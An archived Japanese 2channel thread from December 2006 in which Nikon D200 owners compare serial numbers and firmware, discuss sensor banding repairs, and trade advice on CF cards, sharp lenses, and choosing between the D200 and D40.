206 :名無CCDさん@画素いっぱい:2006/12/24(日) 21:38:03 ID:SXMv5iNH0
昨日買ったけど、2036***です。
レンズキットだけどね。
ちなみにファームウエアは1.01と1.00でした。

207 :名無CCDさん@画素いっぱい:2006/12/24(日) 21:42:20 ID:DqPR357X0
>>206
それ、古過ぎねくね?

地方のキタムラで12月10にボディーのみ買って、2092なんだが。

208 :201:2006/12/24(日) 21:49:35 ID:f54DSpwH0
うちは2097***だよ

209 :名無CCDさん@画素いっぱい:2006/12/24(日) 21:57:33 ID:rals/UCp0
7月に買って2068***

210 :名無CCDさん@画素いっぱい:2006/12/24(日) 22:18:14 ID:SXMv5iNH0
あうぅ、長在つかまされた。ウワーン(AA略)
ボデだけ買えばよかったかな?



211 :名無CCDさん@画素いっぱい:2006/12/24(日) 22:26:50 ID:DqPR357X0
ところでさ、コマンドダイヤルとなりの、AF-ONボタンってどんな時使うの?
シャッター半押しとの違いがわからん。

212 :名無CCDさん@画素いっぱい:2006/12/24(日) 22:32:32 ID:qtkL8B6l0
>>211
置ピンの時、便利だよ。

213 :名無CCDさん@画素いっぱい:2006/12/24(日) 22:32:36 ID:IGw1vt7g0
そろそろ10万台突破しそうですね。
うちのは昨年12月購入の2011***で、シマ対策調整済みです。
>>204
糞レンズ付けっぱなしでD200泣かしてますw
この組み合わせで写真撮るのが楽しいから、これでいいノダ!
http://dc-ita.dyndns.tv/~dc-ita/cgi-bin/imgboard/img-box/img20061224222811.jpg

214 :名無CCDさん@画素いっぱい:2006/12/24(日) 22:33:25 ID:SXMv5iNH0
>>211
露出もロックできると思われ


215 :名無CCDさん@画素いっぱい:2006/12/24(日) 22:36:39 ID:QWJkyDB50
>>211
シャッターボタンでAF効く設定なら不要かもね



216 :名無CCDさん@画素いっぱい:2006/12/24(日) 22:50:00 ID:1dIEbc9b0
>>206
先週火曜日購入で2095***
ファームはABともに2.0ですた。

217 :名無CCDさん@画素いっぱい:2006/12/24(日) 22:50:45 ID:MmV8lbSE0
>>213
>そろそろ10万台突破しそうですね。
ですね・・・って20xxxxxxは日本仕様だったよね?
世界的には5倍くらいは売れているのかな?

>うちのは昨年12月購入の2011***で、シマ対策調整済みです。
うちのは2001***で、実は、やっと今頃、対策調整中で手元に無い所でした。

・・・って写真見たら、何とご近所さんじゃないですか!

218 :名無CCDさん@画素いっぱい:2006/12/24(日) 22:53:31 ID:iDFxLnxS0
漏れのは2099***で、ちょっと惜しいbナした。
どこかに大台のキリ番が出ている頃ですね・・・

219 :名無CCDさん@画素いっぱい:2006/12/24(日) 23:26:24 ID:JFMPE8Bx0
D40と比べるってのはご法度か?

220 :名無CCDさん@画素いっぱい:2006/12/24(日) 23:38:08 ID:IGw1vt7g0
>>219
どんな比較なの?
タブーはないと思うけど・・・・・

221 :名無CCDさん@画素いっぱい:2006/12/24(日) 23:45:11 ID:IGw1vt7g0
>>217
デッカイドーのどこかに生息していますが札幌市民ではありませんw
ニコソ札幌SCは対応がいいので気に入っています。
今回もシマシマと言っただけですぐに修理受け付けてくれました。
9月頃でしたけど。
イルミの時期の大通公園はカメラだらけですね。
D200の同志諸氏も何人か見かけましたよ。

222 :名無CCDさん@画素いっぱい:2006/12/24(日) 23:59:47 ID:QMCxDsnI0
さすがだ。

223 :名無CCDさん@画素いっぱい:2006/12/25(月) 01:10:07 ID:tS5P/ATm0
>>213
ISO400で電飾を含む夜景のうp、乙。
この条件の写真でも今は平和に過ごせるのが嬉しいね。
去年の今頃は、1スレが1日持たなかったような気がする。

224 :名無CCDさん@画素いっぱい:2006/12/25(月) 01:45:41 ID:hTaXOaDZ0
縞は現行でも古いのでも出るよ。
ついでにISO100でも出る。
簡単な実験方法。
日暮れ時の海岸に行って浜辺と水面と海を-1.3EV/RAWで撮って見る。
浜辺は黒く写るから、エディターで明るさをあげてみる。
黒い場所から砂浜が浮き上がって来るよ、縞入りで。
縞は見えづらくなるが確実に出る。
もっとも、同じ事を他社のデジ一でやってみると面白い。
某社の人気機種はたしかに縞は出ないが
ISO100でも暗部には偽色出まくりであることがわかる。
所詮、現時点でデジカメ画像は暗部に偽色が出たり、
変なノイズが入ったりするもんだよ。
もちろん、程度の差はあるけどね、
調整後のD200はそんなにひどいとは言えないと思うよ。


225 :名無CCDさん@画素いっぱい:2006/12/25(月) 02:07:07 ID:OznKUvfe0
縞の出ないK10Dを買ったほうがいいな。

226 :名無CCDさん@画素いっぱい:2006/12/25(月) 02:37:08 ID:6p4KMJ/E0
K10Dって秒5コマなの?

227 :名無CCDさん@画素いっぱい:2006/12/25(月) 04:56:25 ID:mYzQhzc80
秒5コマ稼ぐために縞と睫がついてくるんじゃ本末転倒だよな

228 :名無CCDさん@画素いっぱい:2006/12/25(月) 07:34:14 ID:MlyEOO0L0
秒5コマでピントの合わないのも他社じゃあるみたいだけどね
http://hobby7.2ch.net/test/read.cgi/dcamera/1166736157/

229 :名無CCDさん@画素いっぱい:2006/12/25(月) 11:16:55 ID:LwG3CoBD0
【特別企画】銚子電鉄を撮る
http://dc.watch.impress.co.jp/cda/special/2006/12/25/5292.html

230 :名無CCDさん@画素いっぱい:2006/12/25(月) 11:42:40 ID:oMfhWN+mO
新品のD200にしようか中古のD2Xsにしようか迷ってます。どちらがいいのかな?

231 :名無CCDさん@画素いっぱい:2006/12/25(月) 11:44:26 ID:6CFy2Nxo0
購入1ヶ月、最近RAW撮りを始めました。
CFがレキサーの133-1Gなんで、RAWだと70枚も撮れないので、エクストリームUの2G
を買い足そうと思ってます。?Uを買うのは予算的な問題からです。
連射は殆ど使いませんが、RAW撮りのレスポンス的にUでも問題ないでしょうか?

232 :名無CCDさん@画素いっぱい:2006/12/25(月) 11:45:59 ID:mR4gvmb40
>>231
連写しなければPQIの8GB。
2マソでお釣りくる。

233 :名無CCDさん@画素いっぱい:2006/12/25(月) 11:49:38 ID:tS5P/ATm0
>>224
20Dが出た頃、現像時に夜景をEV+補正すると夜空に...
ってのが話題になったね。
どんなカメラでもセンサーの限界あたりの出力は無理に階調持たせずに
少し余裕を見て黒つぶし・白飛ばしが無難。

234 :名無CCDさん@画素いっぱい:2006/12/25(月) 12:23:01 ID:tS5P/ATm0
>>231
D200でのCFのアクセス速度比較記事
ttp://www.robgalbraith.com/bins/multi_page.asp?cid=6007-8197

次回テンプレに追加おながいします。ってテンプレ無くなってるか...

235 :231:2006/12/25(月) 12:47:23 ID:6CFy2Nxo0
レスありがとうございます。すみませんエクストリームUではなくウルトラUでした。ごめんなさい。

>>232
8GBですか(^^; そうですよね、トランセンドとか安目のメーカーで大容量もありましたね…。忘れてました。
PQIのサイト見てきましたけど、結構早い速度出るんですね。価格では8GBの値段情報が載ってませんでした
けど、今度アキバの店頭で見てきます。ありがとうございます。
>>234
エクストリームVとウルトラUだと違いがあるのはわかりますが、数字を見て納得できても実感が沸きませんです…。
今のレキサー133に何の不満もないためでしょうけど…。でも、あんまり大差なさそうですね。特に僕みたいに連射
殆ど使わないと、実感できないレベルなのかもしれませんね。ありがとうございました。

236 :名無CCDさん@画素いっぱい:2006/12/25(月) 13:32:41 ID:mR4gvmb40
>>235
>PQIのサイト見てきましたけど、結構早い速度出るんですね。
いや、実際は酸ウルトラ2とくらべたら遅いよ。
速度に対しては期待しないでください。
ちなみに3ヶ月くらいこれ使ってるけど、今までエラーなどは無いけど、
信頼性を求めるなら、価格がこなれているウルトラ2がお奨め。

237 :235:2006/12/25(月) 14:19:35 ID:ZpqxM00u0
>>236
おお、そうなんですか。実際、8GBは安くてもちょっと手が出ない(8GB欲しかったら4GB×2とか)ので
トランセンドの4GBかPQIの4GBと考えてました。ウルトラU2GBもかなり安くなりましたしね。
僕は信頼性重視な性格ですが、安いメーカーが信頼性に欠けてるという決定的なソースが少ないのが、
揺れている原因の一つです(^^; まぁレキサーやサンデスクに限っては見たことありませんけど…。
あきばの店頭でじっくり見てきます。信頼性…う〜む…。

238 :名無CCDさん@画素いっぱい:2006/12/25(月) 14:47:11 ID:mR4gvmb40
>>237
PQI買うならここ安いよ。
アキバならもっと安いとこあるかもしれんけど。
http://www.uchida-sj.co.jp/kazamidori/cgi-bin/shop/goods_list.cgi?CategoryID=000005

ウルトラ2買うならドンヤかな。

239 :名無CCDさん@画素いっぱい:2006/12/25(月) 22:07:57 ID:U5c7T20A0
D200を買って早、3週間。
レンズは18-70なんですが、どうしても画質のシャープさが甘いのが気になります。
RAW撮り、アンシャープマスク(適度に)でも納得いきません。

こんな私にはどんなレンズがお似合いですか?

240 :名無CCDさん@画素いっぱい:2006/12/25(月) 22:20:41 ID:ZPQ3x1pR0
シャープさを求めるなら全レンズ中最高峰であるVR200mmF2がお薦め。

241 :名無CCDさん@画素いっぱい:2006/12/25(月) 22:22:25 ID:f5W76UeV0
ソースは?

242 :名無CCDさん@画素いっぱい:2006/12/25(月) 22:23:12 ID:ZPQ3x1pR0
デミグラス。

243 :名無CCDさん@画素いっぱい:2006/12/25(月) 22:24:39 ID:U5c7T20A0
家族スナップ、風景、運動会、などなど。


244 :名無CCDさん@画素いっぱい:2006/12/25(月) 22:25:10 ID:qSLocci70
>>239
先生、ところで仕上がり設定はどうなってる?

245 :名無CCDさん@画素いっぱい:2006/12/25(月) 22:31:27 ID:U5c7T20A0
>>244
いろいろやってみた。
鮮やかに、は、色合いが派手すぎて好みじゃないので却下。
輪郭補正も強めとかしてみたが、今度はノイズが目立ってしまって・・いそ100でも・・。
D200のローパスじゃよっぽどのレンズじゃなきゃ駄目なのかな?


246 :名無CCDさん@画素いっぱい:2006/12/25(月) 22:34:01 ID:U5c7T20A0
連質問、ご勘弁を。

水平取るときって、今のカメラもシューに水準計でokだよね?

247 :名無CCDさん@画素いっぱい:2006/12/25(月) 22:36:45 ID:0zYArWtg0
>>239
ズームならf2.8クラスの高いヤツ。
究極的には単焦点。

248 :名無CCDさん@画素いっぱい:2006/12/25(月) 22:41:29 ID:qSLocci70
>>245
それプリントしてる?プリントして銀塩の写り方と比較してみるといいよ。
等倍でのシャープさに気取られるのはよろしくないかと。

249 :名無CCDさん@画素いっぱい:2006/12/26(火) 00:03:02 ID:X+6QCUQe0
>>239

AFニッコール 50mm F1.8DをF5.6からF7.1くらいで撮影してみたら
満足いくよ。撮影距離は5m未満が良いかな。





250 :名無CCDさん@画素いっぱい:2006/12/26(火) 01:03:47 ID:Xdcqi8CcO
昨日D200買いました。
まったくの素人ですが、楽しみながら上達していきたいと思います。どれ、まずは用語から覚えますか。

251 :名無CCDさん@画素いっぱい:2006/12/26(火) 05:15:52 ID:Xjz5zvsd0
おれっちのPCのモニタで見る限り仕上げノーマルが
一番解像感あるけどな。
鮮やかに、にしてみたら、人物の肌や物体の輪郭が汚くて
コンデジ画像みたいになった。



252 :名無CCDさん@画素いっぱい:2006/12/26(火) 06:14:38 ID:aoOtCu3T0
>>239
三脚使ってないとは言わないよな?

253 :名無CCDさん@画素いっぱい:2006/12/26(火) 09:03:48 ID:N7CPgQkDO
>>239
自分が使ってきたレンズの中でシャープさに満足できた
レンズはシグ50oマクロ、タム180oDiマクロ、ニッコール24/2.8
ニッコールAF-Sサンヨン、シグDGサンニッパ
そこそこシャープ
タム28-75/F2.8Di、シグ17-70マクロ、VR70-200/F2.8
いまいち
VR18-200(だけど便利)
駄目一回使って売った
シグAPO70-300DG
やはり単焦点やマクロ系はシャープで
高倍率ズームはそれなりです

254 :名無CCDさん@画素いっぱい:2006/12/26(火) 15:51:15 ID:zwPE18uh0
俺的には70-200/2.8かなぁ
200-400は買ったけどなんか思ったほどシャープじゃなかったんで調整中


255 :名無CCDさん@画素いっぱい:2006/12/26(火) 16:54:45 ID:6zRYI2x90
単焦点には負けるだろうが、17-55/2.8も良いぞ。
常用化で、グリップ付きのD200に良く似合うのも良い。
高いけどね。

256 :名無CCDさん@画素いっぱい:2006/12/26(火) 19:24:50 ID:r5/hwpLO0
>>254
200-400は高いのに本当に駄目レンズだよね。俺も買って損したよ。

257 :名無CCDさん@画素いっぱい:2006/12/26(火) 20:13:23 ID:AG9Y1OkG0
>254,256
スレ違いですまんが、200-400って、あんまり良くないの?
資金不足で300/2.8+テレコン買ったんだけど、本当は200-400が欲しくて、
お金を貯めようかと思ってるんだけど・・・
一度、使ってる人から「ちょっと甘いよ。やっぱり単焦点の方が全然良いよ」なんて言われたことも
あったけど。



258 :名無CCDさん@画素いっぱい:2006/12/26(火) 20:26:25 ID:52n+xc6W0
200-400は滅茶苦茶いい。とてもズームとは思えない。
キヤノネットが必死で悔しがるだけの事はある。

ただ、サンニッパと比べて画質比較するのは常識的に考えて無しだろ。

259 :名無CCDさん@画素いっぱい:2006/12/26(火) 21:02:50 ID:4DZi4Fq00
D40スレに200-400VRのサンプル上がってるから見てみれば。

260 :名無CCDさん@画素いっぱい:2006/12/26(火) 21:59:11 ID:mjIuGDtb0
D200とD40両方使ってるヒトに聞きたいです
とりあえず最初に買っとけっていえるのはどっち
ちなみに被写体は風景(夜景)、スナップ、マクロまで
ネイチャーはやらないです

261 :名無CCDさん@画素いっぱい:2006/12/26(火) 22:01:19 ID:EHn9XG5D0
最初はD40から始めればいいじゃん。
いきなりD200はハードル高すぎる。

262 :名無CCDさん@画素いっぱい:2006/12/26(火) 22:12:01 ID:AcGpc4j60
>>260
D40はズームマイクロとかが使えないから持ってないし買う予定もないけど、肝心なのはレンズだし、
タイムラグは決定的には問題にならない用途なら、D40で十分以上でしょう。
ボディーの差額で、必要なレンズや、メディアや、外付けHDDとかを買うほうが先決問題。
風景・夜景用の三脚も、D200とちゃちな三脚を組みあわせるより、D40にしっかりしたのを
組みあわせるほうがはるかに有益。
D200は、他は大概持っているか、必要なら買い足す予算があって、その上で考えるクラス。

263 :名無CCDさん@画素いっぱい:2006/12/26(火) 22:16:23 ID:7PkJlxSf0
>>262
>D40はズームマイクロとかが使えないから

キミはAFできないと写真も撮れないのか?

264 :名無CCDさん@画素いっぱい:2006/12/26(火) 22:22:41 ID:IeJDMpRo0
AF無しに動き回る子供や接近してくる猫、飛んでる鳥、飛行機をポンポン撮れる腕前があれば、ね。

265 :名無CCDさん@画素いっぱい:2006/12/26(火) 22:23:01 ID:AcGpc4j60
>>263
使えるシーンでは使うという柔軟性が欠損している人には関係ないレベルの話なんで悪しからず。

266 :名無CCDさん@画素いっぱい:2006/12/26(火) 22:24:51 ID:AcGpc4j60
>>264
さすがにズームマイクロではそういう使い方はしないけど。

267 :名無CCDさん@画素いっぱい:2006/12/26(火) 22:26:32 ID:IeJDMpRo0
ズームマイクロ専用なんだ?

268 :名無CCDさん@画素いっぱい:2006/12/26(火) 22:27:48 ID:AcGpc4j60
>>267
? 何の話?

269 :名無CCDさん@画素いっぱい:2006/12/26(火) 22:31:12 ID:IeJDMpRo0
さあ?

270 :名無CCDさん@画素いっぱい:2006/12/26(火) 22:42:06 ID:mjIuGDtb0
みなさんスレありがとう
今は置きピンしか出来ないレンジファインダー使ってるんで
AFは外せないです(動きのあるモノも撮りたい時あるので)
「カメラはレンズでキマル」は心得ているつもりです
が、デジの場合は撮像素子のチューニングなんかが絡んできますよね
良いレンズでも相性問題はでないのですか

271 :名無CCDさん@画素いっぱい:2006/12/26(火) 22:44:32 ID:h3FTjb4M0
良いレンズはどのカメラでもいい結果を出すよ。

272 :名無CCDさん@画素いっぱい:2006/12/26(火) 22:50:22 ID:AcGpc4j60
>>270
レンズとの相性ではないけど、6MPのほうが偽解像・色モアレが出やすくて、シャープな
レンズほど目立つことがあるから、市街地の風景では要注意度が高いのは事実ですね。
その辺が揉んだになることが多い使い方なら10MPのほうが無難かと。

273 :名無CCDさん@画素いっぱい:2006/12/26(火) 22:50:46 ID:mjIuGDtb0
D200の予算でD40と良いレンズ捜します

274 :名無CCDさん@画素いっぱい:2006/12/26(火) 22:50:56 ID:AcGpc4j60
>>272
ぐわっ 揉んだ → 問題

275 :名無CCDさん@画素いっぱい:2006/12/26(火) 23:09:41 ID:YLIGLQOy0
>>274
誤爆だったのかw

(; ・`д・´)??になってたよw

276 :名無CCDさん@画素いっぱい:2006/12/26(火) 23:34:33 ID:AcGpc4j60
>>275
誤爆ではないミスタイプ訂正(`・ω・´)
オオキナジデハカケナイガ イマサラロクエムピーニハモドレナインダッタリスル(´;ω;`)ウッウッウッ

277 :名無CCDさん@画素いっぱい:2006/12/27(水) 02:28:40 ID:KB8cSS2d0

http://www.16-9.net/lens_tests/14mm/14mm_test_5.html
EF14mmは単焦点なのに収差・周辺流れとも
シグマ12-24mmズ−ムに完敗。
キヤノンクオリティに乾杯!!!




278 :名無CCDさん@画素いっぱい:2006/12/27(水) 09:09:13 ID:8RpKnYsWO



279 :名無CCDさん@画素いっぱい:2006/12/27(水) 23:23:06 ID:ooBAA+Tv0
初めまして。
シンクロターミナルのキャップをなくしてしまったのですが、手に入れる方法はありますでしょうか?
ニコンのカスタマーに申し込むのが一般的ですか?

280 :名無CCDさん@画素いっぱい:2006/12/27(水) 23:26:36 ID:mCLwu3Qr0
>>279
サービスセンターにはいつも在庫してるみたいですが。

281 :名無CCDさん@画素いっぱい:2006/12/27(水) 23:27:54 ID:18STDqNQ0
>>279
SCもしくは淀などの大手量販店には在庫があります。

282 :名無CCDさん@画素いっぱい:2006/12/27(水) 23:30:03 ID:zxCqRUmr0
>>279
近所のカメラ屋に頼むのが普通。大きい店なら置いてるし。

つか俺キャップ外したまんまだし、次機種はレリーズ穴復活きぼんw

283 :名無CCDさん@画素いっぱい:2006/12/27(水) 23:37:23 ID:p+MAx2xM0
キャップなんて、邪魔なだけだろ。
いらないって

284 :名無CCDさん@画素いっぱい:2006/12/27(水) 23:41:52 ID:mCLwu3Qr0
>>283
でも売り物の防滴がきかないんじゃない?
まあ、キャップなしだと水が進入するものかどうかは知らないけど。

285 :279:2006/12/27(水) 23:56:30 ID:ooBAA+Tv0
皆さん素早いレスありがとうございます。
近所のキタムラにでも注文してみることにします。
SCやヨドバシに近ければいいんですけどね、、、

286 :名無CCDさん@画素いっぱい:2006/12/28(木) 09:25:27 ID:Xqz7pWQV0
D2シリーズみたいにシンクロキャップの収納場所作って欲しかったよね。
スペース在りそうなのに付いて無いのは、それが誰かの特許・実用新案で
何処かにライセンス料払わなくてはならないってものなのかなぁ。

287 :名無CCDさん@画素いっぱい:2006/12/28(木) 11:23:34 ID:6N1fCjBe0
昨日35mmF2D買った。
これで、うちのD200もお散歩カメラになりました。
このレンズ、たまたま寄った店にはあったんだけど、
在庫切らしてるところも多いね。
ニコンのオンラインショップでも在庫切れだし。
ディスコン?リニューアルすんのかな?

288 :名無CCDさん@画素いっぱい:2006/12/28(木) 11:28:40 ID:Xqz7pWQV0
>>287
単に需要に供給が間に合わないだけだと思う。
この現象はD100発売の頃から既に始まっていた。

83 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)